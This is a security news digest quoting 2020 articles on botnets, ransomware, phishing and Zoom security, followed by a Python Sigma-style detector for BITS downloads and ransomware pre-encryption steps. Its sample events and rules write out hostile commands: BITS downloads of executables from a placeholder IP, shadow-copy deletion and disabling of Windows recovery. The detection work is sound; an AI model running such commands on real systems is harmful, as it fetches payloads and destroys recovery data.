- “We all know there are a number of different security devices that need to be continually monitored because they represent attack vectors. That’s why understanding configuration management is critical to security hygiene. As practitioners, we need to adhere to CIS controls as they provide a critical baseline for maintaining our security framework and keeping up our integrity monitoring processes.” https://www.tripwire.com/state-of-security/security-data-protection/file-integrity-monitoring/security-leaders-consider-building-business-case-integrity-monitoring/
- “New technologies often present interesting challenges for security teams, with cloud services such as AWS, Azure and GCP providing particularly novel cases in comparison to “classic” on-premise systems. As cloud services race to add new features that drive new customer interest and increase retention of existing clients, there is a very real risk of exposing new threat vectors to the business if even the most minor of misconfigurations occurs. This makes the role of cloud administrators and their daily security practices all the more important.” https://www.tripwire.com/state-of-security/security-data-protection/cloud/auditing-cloud-administrator-behavior-data-breach-preparedness/
- “Dark_nexus, named so due to strings printed on its banner, has code links to both Mirai and Qbot, but the team says the majority of the botnet’s functions are original.” https://www.blackhatethicalhacking.com/news/dark-nexus-botnet-outstrips-other-malware-with-new-potent-features
- “With this free sigma rule, you can detect BITS activity that is used in a malicious way. Microsoft BITS (Background Intelligent Transfer Service) is a tool present in all modern Microsoft Windows operating systems. As the name says, you can see it as a “curl” or “wget” tool for Windows.” https://www.threathunting.se/2020/04/09/detect-malicious-bits-activity-free-sigma-rule/
- “Disregarding ransomware, persistence is one of the more sought-after techniques of an attacker. Persistence allows an attacker to re-infect a machine or maintain their existing connection after events such as a system reboot, changed credentials, or even re-imaging a machine. Attackers want to do the least amount of work possible, which includes spending time getting access to their target.” https://www.tripwire.com/state-of-security/mitre-framework/the-mitre-attck-framework-persistence/
- “Google has removed an Android VPN program from the Google Play store after researchers notified it of a critical vulnerability. The app, SuperVPN, has been downloaded over 100 million times.” https://nakedsecurity.sophos.com/2020/04/09/google-removes-android-vpn-with-critical-vulnerability-from-play-store/
- “Check Point’s researchers were able to find three samples, created by Metasploit Framework, carrying the innocent name – ‘coronavirus.apk’. This app can be easily delivered and installed on large numbers of devices, and can fulfil almost every malicious action the threat actor wishes. Once executed on the device, the app starts a service that hides its icon in order to make it harder to get rid of it.” https://research.checkpoint.com/2020/covid-19-goes-mobile-coronavirus-malicious-applications-discovered/
- Wait till this application, Tuned, gets hacked “Facebook on Tuesday released a new couples-only messaging app that gives you a place to get “as mushy, quirky, and silly” with your bae as you do in front of each other even when you’re apart, keeping it to yourselves and thus avoiding setting off nausea in others.” https://nakedsecurity.sophos.com/2020/04/09/facebooks-new-tuned-chat-app-lets-couples-keep-their-mush-private/
- “Yesterday Google banned the popular videoconferencing software Zoom from its employees’ devices, and now the German foreign ministry has restricted the use of the video conferencing service to fixed-connection computers due to concerns about security issues.” https://securityaffairs.co/wordpress/101320/security/german-foreign-ministry-zoom-limitation.html
- “The $100 Tapplock smart locks are internet-connected and use fingerprint biometrics for security. The company also offers a companion mobile app that allows users to lock and unlock their smart locks with Bluetooth. The FTC alleges that there are “reasonably foreseeable electronic security vulnerabilities that could have been avoided” within the device and the app.” https://threatpost.com/unbreakable-smart-lock-ftc-deceptive-security-claims/154600/
- “An ongoing phishing campaign is reeling in victims with a recycled Cisco security advisory that warns of a critical vulnerability. The campaign urges victims to “update,” only to steal their credentials for Cisco’s Webex web conferencing platform instead.” https://threatpost.com/cisco-critical-update-phishing-webex/154585/
- “After Sodinokibi is installed, it immediately gets to work. The ransomware begins by creating a .txt file with the path of the encrypted files, with a random extension followed by -HOW-TO-DECRYPT.txt. Commands are then issued for Shadow Volume Copies to be deleted, as well as to disable Windows Startup Repair.” https://resources.infosecinstitute.com/malware-spotlight-sodinokibi/
- “CERT-GIB’s report is based on analyses of coronavirus-related phishing traffic by the Threat Detection System (TDS) Polygon as part of operations to prevent threats spread online. Most COVID-19-related phishing emails analyzed had different spyware strains embedded as attachments. AgentTesla (45%), NetWire (30%), and LokiBot (8%) were the most actively exploited malware families.” https://securityaffairs.co/wordpress/101327/malware/top-malware-coronavirus-campaigns.html
- “While the Iranian cyber program remains at the forefront of Tehran’s asymmetric capabilities, its intelligence apparatus is colored by various dysfunctions and seemingly destabilizing traits. In particular, the politicization of its various intelligence agencies and ensuing domestic feuds have reportedly polarized officer-level rank and file throughout the various security crises of the Islamic Republic. These crises have surfaced publicly and have acted as catalysts to drive insider threats, have lowered intelligence morale, and have increased the occurrences of leaks. Competition between the intelligence groups has also allegedly led to direct acts of sabotage between agencies.” https://www.recordedfuture.com/iran-cyber-operations-structure/
- “The online videoconferencing service added Alex Stamos to the team and has also formed an expert advisory board to grapple with the pains of its COVID-19 growth spurt.” https://threatpost.com/zoom-facebook-ciso-security-lawsuit/154614/
- “Phishing scammers have started to impersonate President Trump and Vice President Mike Pence in emails that distribute malware or perform extortion scams” https://www.bleepingcomputer.com/news/security/phishing-emails-impersonate-the-white-house-and-vp-mike-pence/
- “Travelex reportedly paid a $2.3 million ransom payment to get their systems back online after being encrypted by a Sodinokibi ransomware attack.” https://www.bleepingcomputer.com/news/security/travelex-reportedly-paid-23-million-ransom-to-restore-operations/
- “Payments processor Visa is urging merchants to migrate their online stores to Magento 2.x before the Magento 1.x e-commerce platform reaches end-of-life (EoL) in June 2020 to avoid exposing their stores to Magecart attacks and to remain PCI compliant.” https://www.bleepingcomputer.com/news/security/visa-urges-merchants-to-migrate-e-commerce-sites-to-magento-2x/
- “Developers of fleeceware apps are now using the Apple App Store as a distribution platform having already successfully delivered their iOS apps onto over 3.5 million iPhone and iPad devices according to a report from Sophos.” https://www.bleepingcomputer.com/news/security/over-36m-users-installed-ios-fleeceware-from-apple-s-app-store/
- “Several federal agencies recommended Thursday that U.S. regulators block a Chinese state-owned telecommunications firm from providing service to American customers.” https://www.cyberscoop.com/executive-branch-agencies-recommend-us-bar-china-telecom/
- “Countless legitimate businesses are offering discounts or altering their services to turn a profit during the coronavirus pandemic. Cybercriminal forums are no different.” https://www.cyberscoop.com/coronavirus-cybercrime-forums-dark-web/
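Two of the items above describe behaviour you can hunt for in process-creation telemetry: BITS being used as a “curl/wget for Windows” (the threathunting.se Sigma rule item) and Sodinokibi deleting Shadow Volume Copies and disabling Windows Startup Repair (the Infosec Institute item). The block below is an added example, not code from any of the linked articles and not the threathunting.se rule itself: a minimal evaluator for Sigma-style `selection` maps (the `contains`, `contains|all`, `endswith` modifiers, matched case-insensitively as Sigma does) run over constructed Sysmon-style process-creation events. The rule titles, the specific command-line patterns (`bitsadmin /transfer`, `Start-BitsTransfer`, `vssadmin delete shadows`, `bcdedit ... recoveryenabled no`, `wmic shadowcopy delete`) and the sample events are my own assumptions about what these behaviours commonly look like on the command line, not details taken from the page.

```python
"""Sigma-style detection of BITS downloader abuse and ransomware pre-encryption
commands (shadow copy deletion, Startup Repair disabling) over sample events.
Added example; rules, patterns and events are assumptions, not page content."""
from typing import Any, Dict, List, Tuple

Event = Dict[str, str]
Rule = Dict[str, Any]

# Constructed Sysmon Event ID 1-style records (not real telemetry).
SAMPLE_EVENTS: List[Event] = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job /download /priority high http://203.0.113.10/a.exe C:\Users\Public\a.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",          # benign: listing jobs
     "CommandLine": "bitsadmin /list /allusers",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -nop Start-BitsTransfer -Source http://203.0.113.10/b.dll -Destination C:\Users\Public\b.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe Delete Shadows /All /Quiet",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\update.exe"},
    {"Image": r"C:\Windows\System32\bcdedit.exe",
     "CommandLine": "bcdedit /set {default} recoveryenabled No",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\update.exe"},
    {"Image": r"C:\Windows\System32\vssadmin.exe",           # benign: listing shadows
     "CommandLine": "vssadmin list shadows",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# Sigma-like selections. Only the 'selection' block is modelled; the implicit
# condition is 'selection' (every field entry must match).
RULES: List[Rule] = [
    {"title": "BITS downloader via bitsadmin /transfer",
     "selection": {"Image|endswith": "\\bitsadmin.exe",
                   "CommandLine|contains|all": ["/transfer", "http"]}},
    {"title": "BITS downloader via Start-BitsTransfer",
     "selection": {"Image|endswith": "\\powershell.exe",
                   "CommandLine|contains": "Start-BitsTransfer"}},
    {"title": "Shadow copy deletion via vssadmin",
     "selection": {"Image|endswith": "\\vssadmin.exe",
                   "CommandLine|contains|all": ["delete", "shadows"]}},
    {"title": "Startup Repair disabled via bcdedit",
     "selection": {"Image|endswith": "\\bcdedit.exe",
                   "CommandLine|contains": ["recoveryenabled no",
                                            "bootstatuspolicy ignoreallfailures"]}},
    {"title": "Shadow copy deletion via wmic",
     "selection": {"Image|endswith": "\\wmic.exe",
                   "CommandLine|contains|all": ["shadowcopy", "delete"]}},
]


def _field_matches(value: str, spec: str, wanted: Any) -> bool:
    """Evaluate one 'Field|modifier...' entry. Sigma string matching is
    case-insensitive, so both sides are lowercased. A list value means
    'any of' unless the 'all' modifier is present."""
    v = value.lower()
    mods = spec.split("|")[1:]
    candidates = [w.lower() for w in (wanted if isinstance(wanted, list) else [wanted])]
    if "endswith" in mods:
        test = v.endswith
    elif "startswith" in mods:
        test = v.startswith
    elif "contains" in mods:
        test = lambda w: w in v
    else:
        test = lambda w: w == v
    return all(map(test, candidates)) if "all" in mods else any(map(test, candidates))


def rule_matches(rule: Rule, event: Event) -> bool:
    """All entries of the selection must hold for the event (AND semantics)."""
    return all(_field_matches(event.get(spec.split("|")[0], ""), spec, wanted)
               for spec, wanted in rule["selection"].items())


def evaluate(rules: List[Rule], events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event_index, rule_title) for every rule that fires on an event."""
    return [(i, r["title"]) for i, ev in enumerate(events) for r in rules
            if rule_matches(r, ev)]


if __name__ == "__main__":
    for idx, title in evaluate(RULES, SAMPLE_EVENTS):
        print(f"event {idx}: {title} <- {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Running it flags the `bitsadmin /transfer` download, the `Start-BitsTransfer` download, the `vssadmin Delete Shadows` and the `bcdedit ... recoveryenabled No` events, while the benign `bitsadmin /list` and `vssadmin list shadows` events stay quiet; in production the bcdedit and vssadmin hits are worth correlating on a shared non-standard parent process, as in the sample, rather than alerting on each alone.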
#security #cybersecurity #itsecurity #privacy #cis #aws #azure #gcp #darknexus #ddos #botnet #mirai #qbot #mitre #att&ck #supervpn #cerberus #hiddad #tuned #zoom #tapplock #webex #sodinokibi #agenttesla #netwire #lokibot #iran #travelex #magento #visa #fleeceware #china